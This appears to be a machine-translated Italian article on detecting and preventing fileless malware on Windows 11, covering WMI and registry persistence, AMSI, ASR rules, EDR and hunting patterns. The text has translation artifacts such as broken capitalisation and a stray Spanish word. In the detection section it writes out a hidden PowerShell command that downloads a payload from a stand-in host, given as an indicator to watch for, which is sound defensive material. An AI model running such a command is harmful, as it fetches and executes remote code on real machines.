El malware senza file È diventato uno di quei grattacapi che continuano a crescere in qualsiasi ambiente Windows moderno, incluso Windows 11. Questo tipo di attacco evita il disco rigido e si basa su memoria, script e file binari di sistema legittimi, per cui i programmi antivirus basati su firme hanno molte difficoltà a rilevarlo in tempo.
Per localizzarlo con una certa affidabilità “Eseguire una scansione antivirus” non è sufficienteÈ necessario combinare una telemetria di processo avanzata, analisi comportamentale, ispezione della memoria e un uso efficace dei controlli nativi di Windows (PowerShell, WMI, registro, AMSI, regole ASR, ecc.). Inoltre, è importante comprendere nel dettaglio cos'è effettivamente un malware fileless, quali varianti esistono, come entra nei sistemi, come persiste e quali tracce lascia, anche se tutto avviene nella RAM.
Cos'è il malware fileless e perché è così problematico in Windows 11?
Quando parliamo malware senza file a cui ci riferiamo Codice malevolo Non ha bisogno di lasciare nuovi eseguibili visibili nel file system per funzionare. In genere si inietta nei processi esistenti ed esegue direttamente in memoria, sfruttando strumenti firmati Microsoft come PowerShell, WMI, rundll32, mshta o VBScript/JScriptCiò ne riduce l'impatto e gli consente di sfuggire al rilevamento da parte dei motori che analizzano solo i file sospetti sul disco.
Persino il Documenti di Office, PDF o link di phishing I file che eseguono comandi e shellcode in memoria rientrano in questo fenomeno perché il file stesso fornisce poche informazioni utili per l'analisi. Qualcosa di simile accade con le macro e il meccanismo DDE in Office: il codice dannoso viene eseguito incorporato in processi legittimi come Word o Excel, senza che sul disco compaia alcun file eseguibile insolito.
Gli aggressori si uniscono ingegneria sociale e exploitUn'e-mail con un allegato, un link a un sito web compromesso o una macro "innocente" possono innescare una catena in cui uno script scarica ed esegue il payload nella RAM, cancellando le tracce il prima possibile. L'obiettivo finale può variare dal furto di credenziali e dati sensibili all'implementazione di ransomware, all'esecuzione di una sorveglianza prolungata (APT) o al movimento laterale nella rete senza essere rilevati.
Tipi di malware senza file in base alla loro impronta sul sistema
Per evitare di confondere i concetti, è utile classificare le minacce in base al grado di interazione con il file systemCiò chiarisce cosa persiste, dove è archiviato il codice e quali prove forensi lascia.
Tipo I: nessuna attività sui file
Qui stiamo parlando di "vero" fileless: il codice non scrive nulla sul disco. Un esempio classico è l'uso di vulnerabilità di rete come gli attacchi SMB (come l'attacco EternalBlue) per caricare una backdoor nella memoria del kernel, come DoublePulsar. L'intero attacco risiede nella RAM e non compaiono nuovi file nel file system.
Minacce che rientrano in questa stessa categoria infettare i firmware da BIOS/UEFI, schede di rete, dischi o persino sottosistemi CPU. Persistono nonostante i riavvii e le reinstallazioni del sistema operativo, e pochissime soluzioni di sicurezza ispezionano davvero questo livello. Questi attacchi sono meno frequenti e altamente sofisticati, ma la loro combinazione di furtività e persistenza Ciò li rende particolarmente pericolosi.
Tipo II: Attività di archiviazione indiretta
In questo gruppo, il malware non crea un proprio eseguibile, ma utilizza contenitori gestiti dal sistema che vengono infine archiviati su disco. Ad esempio, backdoor che memorizzano Comandi o script di PowerShell all'interno dei repository WMI o del Registro di sistema di Windows e vengono attivati tramite filtri evento o chiavi Run/RunOnce. Il repository WMI e il Registro di sistema risiedono sul disco come database legittimi, difficili da pulire senza modificare il sistema.
Da un punto di vista pratico sono considerati anche fileless perché il contenitore (WMI, registro, settore di avvio, ecc.) Non è un eseguibile classico. Ed è delicato da pulire. L'effetto finale è una sottile persistenza, con pochissime tracce "tradizionali".
Tipo III: ibridi dipendenti dal file
Qui, la logica dannosa risiede nella memoria, nel registro o in WMI, ma necessita di alcuni trigger basato su fileUn esempio tipico è Kovter: registra un verbo shell per un'estensione rara e, quando tale file viene aperto, viene eseguito un piccolo script che, tramite mshta.exe o altri file binari, ricostruisce il payload dannoso dal Registro di sistema.
Questi file "esca" non contengono carichi utili che possono essere analizzati come tali; la vera sostanza è in contenitori come Registrazione o WMIEcco perché solitamente vengono raggruppate sotto la categoria delle minacce fileless, anche se, a rigor di termini, dipendono da uno o più artefatti del disco.
Vettori di input e posizioni in cui è nascosto il fileless fileless
Per migliorare il rilevamento, la mappatura è fondamentale. Dove entra il malware e in quali processi o oggetti risiede?Questa visualizzazione aiuta a implementare controlli specifici e a dare priorità alla telemetria realmente importante.
Nel campo della gesta Si distinguono due categorie principali. Da un lato, ci sono gli attacchi basati su file, in cui documenti Office, PDF, eseguibili, file LNK o vecchi contenuti Flash/Java sfruttano il browser o l'applicazione che li elabora, caricando shellcode in memoria (un tipico caso di campagne di spam di massa che utilizzano Word con macro). Dall'altro, abbiamo attacchi basati sulla rete, come WannaCry, in cui un pacchetto dannoso sfrutta una vulnerabilità in un servizio (SMB, RDP, ecc.) e ottiene l'esecuzione diretta nell'area utente o nel kernel, senza mai scrivere un nuovo file sul disco.
Esiste anche un vettore di hardware e firmware Questo non è un problema di poco conto. Dispositivi con firmware riprogrammabile (dischi rigidi, schede di rete, periferiche USB di tipo BadUSB), BIOS/UEFI o persino mini-hypervisor dannosi possono introdurre codice che viene eseguito al di sotto del sistema operativo. Queste tecniche rientrano pienamente nel Tipo I: persistere al di fuori del sistema operativo e sono estremamente difficili da controllare e sradicare.
Per quanto riguarda l'esecuzione e l'iniezione, gli aggressori abusano di entrambi File "normali" come gli script in memoriaI file eseguibili (EXE/DLL/LNK) o le attività pianificate possono iniettare processi legittimi. Persino il settore di avvio (MBR/EFI) può essere manipolato da famiglie di malware come Petya per prenderne il controllo fin dall'avvio, bypassando il file system tradizionale.
A peggiorare le cose, gli attori avanzati (APT come The Dukes/APT29) hanno dimostrato campagne con backdoor senza file come RegDuke o POSHSPYche risiedono quasi interamente nella memoria, WMI e registro, combinando diverse tecniche per ridurre al minimo le tracce.
Catene di attacco fileless: fasi e segnali da monitorare
Sebbene non lascino eseguibili visibili, gli attacchi senza file seguono comunque un sequenza di fasi abbastanza riconoscibileComprenderli è fondamentale per sapere quali eventi e relazioni tra processi vale la pena monitorare.
- Fase di accesso iniziale. In genere si basa sul phishing con allegati o link, siti web compromessi o credenziali rubate. È molto comune vedere che il punto di partenza è un documento di Office che, quando il contenuto attivo è abilitato, avvia un comando PowerShell con parametri sospetti (bypass di ExecutionPolicy, finestra nascosta, download da domini sconosciuti, ecc.).
- Fase di persistenzaÈ qui che entrano in gioco i filtri e le sottoscrizioni WMI, le chiavi di esecuzione automatica del Registro di sistema (Run, RunOnce, Winlogon), l'abuso dell'Utilità di pianificazione e la modifica del settore di avvio. Il malware tenta di garantire che, dopo un riavvio o una disconnessione, l'ambiente dannoso rientri in memoria senza dover reintrodurre nuovi file binari.
- Fase di Movimento laterale e arrampicataGli strumenti di sistema (PowerShell Remoting, PsExec, WMI, RDP) consentono l'accesso da un computer all'altro utilizzando credenziali rubate. Anche in questo caso, tutto ciò avviene "in nero", ovvero utilizzando utility legittime già installate.
- Fase finale: esfiltrazione e impattoI malware possono crittografare i dati (ransomware fileless), esfiltrare informazioni verso server di comando e controllo (C2) tramite browser, Bitsadmin o PowerShell, o manipolare sistemi critici. Durante tutto il ciclo di vita, gli indicatori chiave sono nascosti negli argomenti della riga di comando, negli alberi di processo anomali, nelle connessioni in uscita sospette e nelle chiamate API di iniezione.
Tecniche comuni di attacco senza file
L'ombrello senza file comprende molte tecniche diverse, ma molte vengono ripetute più e più volte. Comprenderle aiuta nella pianificazione. regole di rilevamento comportamentale e campagne di caccia efficaci.
Uno dei più comuni è il malware residente in memoriaL'aggressore carica il payload nello spazio di memoria di un processo attendibile (ad esempio, explorer.exe, svchost.exe o un browser) e lo lascia in attesa di comandi. Nel caso di rootkit e hook a livello di kernel, il livello di occultamento è ancora maggiore e molte soluzioni che analizzano solo lo spazio utente vengono ignorate.
Un'altra tattica è la persistenza nel registro di Windowsmemorizzando blob crittografati o stringhe offuscate che vengono poi reidratate utilizzando launcher legittimi come mshta, rundll32 o wscript. Il piccolo "loader" può autodistruggersi immediatamente dopo l'esecuzione, in modo che le uniche tracce significative rimangano nelle chiavi di registro e nella memoria.
Si vede anche molto del falsificazione delle credenzialiUna volta rubati nomi utente e password, l'aggressore può aprire shell remote, eseguire script direttamente nella console senza scrivere file e installare backdoor silenziose in WMI o nel registro. In ambito aziendale, ciò consente campagne di spionaggio prolungate con un tasso di rilevamento molto basso se l'uso degli strumenti di amministrazione non viene adeguatamente monitorato.
Nella parte più visibile, il ransomware senza file È in grado di crittografare i dati e comunicare con la sua infrastruttura C2, operando quasi interamente dalla memoria. Spesso, il primo segnale che qualcosa non va si ha quando i file sono già crittografati, perché le fasi precedenti non hanno attivato alcun avviso di sicurezza.
Perché "bloccare tutto" in azienda non funziona
Potrebbe sembrare allettante andare dritto al punto e Disabilita PowerShell, blocca le macro o proibisci WMIIl problema è che si interromperebbe gran parte delle operazioni quotidiane: PowerShell è fondamentale per l'amministrazione moderna, Office è lo strumento di lavoro di base e WMI è il cuore della gestione del sistema Windows.
Ciononostante, molti tentativi di proteggersi dagli attacchi fileless si sono basati proprio su questo: whitelist molto rigide, blocchi macro non strategici o semplicemente la disattivazione di PowerShell.exe. Gli aggressori, tuttavia, ci stanno lavorando da tempo. imparare a schivare quei blocchi: utilizzando la propria copia di PowerShell, caricandola tramite DLL con rundll32, impacchettando gli script all'interno di file eseguibili, nascondendo il codice nelle immagini (steganografia) o richiamando PowerShell tramite strumenti intermedi.
Un altro errore comune è affidarsi esclusivamente a soluzioni che Decidono nel cloudSe l'agente endpoint deve interrogare un server remoto prima di interrompere l'attività sospetta, la prevenzione in tempo reale ne risente: è necessaria la connettività e, inoltre, si introduce un ritardo che negli attacchi rapidi (ransomware, wiper) può essere fatale.
In pratica, la difesa contro il malware senza file richiede una combinazione di Telemetria locale avanzata, motori di rilevamento comportamentale sull'endpoint stesso E, come ulteriore livello, analisi cloud per arricchire, correlare e migliorare l'intelligence. Ma la decisione di interrompere un processo o annullare le modifiche deve poter essere presa localmente, anche offline.
Come rilevare malware senza file in Windows 11: telemetria e comportamento
La strategia vincente prevede monitorare i processi, la memoria e il comportamentoNon solo file. I modelli dannosi sono molto più stabili delle varianti dello stesso malware, quindi un approccio basato sul comportamento funziona meglio contro minacce nuove o offuscate.
Nell'ecosistema Microsoft, il Interfaccia di scansione antimalware (AMSI) È un componente chiave. Consente di intercettare script in PowerShell, VBScript o JScript (e altri linguaggi supportati) anche quando vengono creati dinamicamente in memoria. Prima dell'esecuzione, il contenuto dello script viene inviato al motore antimalware registrato da AMSI, facilitando il rilevamento di stringhe sospette, offuscamenti grossolani e comportamenti tipici del malware.
Inoltre, è essenziale avere un monitoraggio dettagliato del processoPunti di inizio e fine, PID, processi padre e figlio, percorso eseguibile, hash, albero completo dei processi e, cosa molto importante, righe di comando complete. Molti indicatori di un attacco sono nascosti dietro flag e argomenti. Comandi come powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http://dominiotld/payload') Non dovrebbero passare inosservati in un ambiente un po' maturo.
La ispezione della memoria Questo è un altro elemento chiave. È essenziale essere in grado di identificare i payload PE riflessi, le regioni di memoria contrassegnate come eseguibili in processi che normalmente non dovrebbero averli e i tipici pattern di iniezione (WriteProcessMemory, CreateRemoteThread, ecc.). Soluzioni moderne come EDR/Managed EDR (EMDR) e prodotti come Microsoft Defender for Endpoint o piattaforme come SentinelOne monitorano queste operazioni a livello di kernel per distinguere le attività dannose da quelle legittime.
Tutto questo è completato da controlli specifici come il Protezione MBR/EFI per rilevare e invertire le manipolazioni del settore di avvio e con la capacità di catturare i buffer di memoria associati alle esecuzioni sospette in modo che i team di risposta possano generare nuove firme o regole di comportamento.
Passaggi pratici in Windows 11
Oltre ad avere una potente soluzione EDR, Windows 11 offre controlli nativi molto utili per rendere le cose difficili ai malware senza file e, tra l'altro, migliorare la visibilità per le attività di ricerca delle minacce.
Prevenzione
In PowerShell, è consigliabile abilitare Registrazione dei blocchi di script e registrazione dei moduliApplicare modalità limitate ove possibile e monitorare l'utilizzo di ExecutionPolicy Bypass e delle finestre nascoste. Questo fornisce una cronologia degli script eseguiti, anche se generati dinamicamente, ed è prezioso per rilevare gli exploit successivi con PowerShell.
Le Regole di riduzione della superficie di attacco (ASR) Consentono di impedire a Office di creare processi che prendono di mira PowerShell, cmd, mshta o altri componenti ad alto rischio, oltre a impedire l'uso improprio di WMI o PsExec quando non necessari. Se configurati correttamente, riducono drasticamente la superficie di attacco fileless negli ambienti d'ufficio senza interrompere le operazioni aziendali.
Sul fronte Office, è importante rafforzare le macroL'obiettivo è disabilitarli per impostazione predefinita, consentire solo macro firmate internamente, utilizzare elenchi di attendibilità rigorosi e rivedere i flussi di lavoro legacy basati su DDE. L'obiettivo è garantire che l'apertura di un documento ricevuto via e-mail non dia carta bianca per eseguire alcunché sul sistema.
Per l'aspetto della persistenza è essenziale Controlla WMI, il Registro e le attività pianificateLe iscrizioni agli eventi devono essere monitorate. root\Subscription, classi come __EventFilter, CommandLineEventConsumer y __FilterToConsumerBindingcosì come le chiavi Run/RunOnce e le nuove attività che richiamano script o file binari sospetti. Strumenti come Sysmon sono molto utili per generare eventi complessi; in ambienti di grandi dimensioni, ha senso affidarsi a un EDR e a un buon SIEM.
Come sempre, il rattoppamento e indurimento La sicurezza del sistema operativo, dei browser, di Office e dei servizi di rete è una linea di difesa fondamentale. Molte intrusioni senza file iniziano sfruttando vulnerabilità note che avrebbero potuto essere corrette con aggiornamenti di routine.
Caccia
Ha senso focalizzare le ricerche su modelli di esecuzione anomaliProcessi di Office che avviano PowerShell o mshta, righe di comando con downloadstring/downloadfile, script con offuscamento chiaro, iniezioni riflesse e connessioni in uscita verso domini sospetti o TLD insoliti. Incrociando tutto questo con informazioni su reputazione e frequenza, è possibile ridurre il rumore e scoprire campagne discrete.
Infine, non bisogna dimenticare il consapevolezza degli utenti e dei team tecniciInsegnare agli utenti come identificare e-mail di phishing, allegati pericolosi, link sospetti o comportamenti strani del computer (finestre che si chiudono da sole, processi della console fugaci) rimane una barriera molto conveniente contro campagne massicce senza file.
La realtà è che il malware senza file non è più una rarità, ma una tecnica comune negli attacchi mirati e nelle campagne massicce che abusano degli script. Concentrandosi su comportamento del processo, utilizzo della memoria e origini di ogni esecuzioneSfruttando AMSI, telemetria di alta qualità, controlli di Windows 11 e piattaforme EDR con analisi comportamentale e integrando il tutto con policy realistiche per macro, PowerShell e WMI, qualsiasi organizzazione è in una posizione molto migliore per rilevare e interrompere queste catene prima che causino un disastro.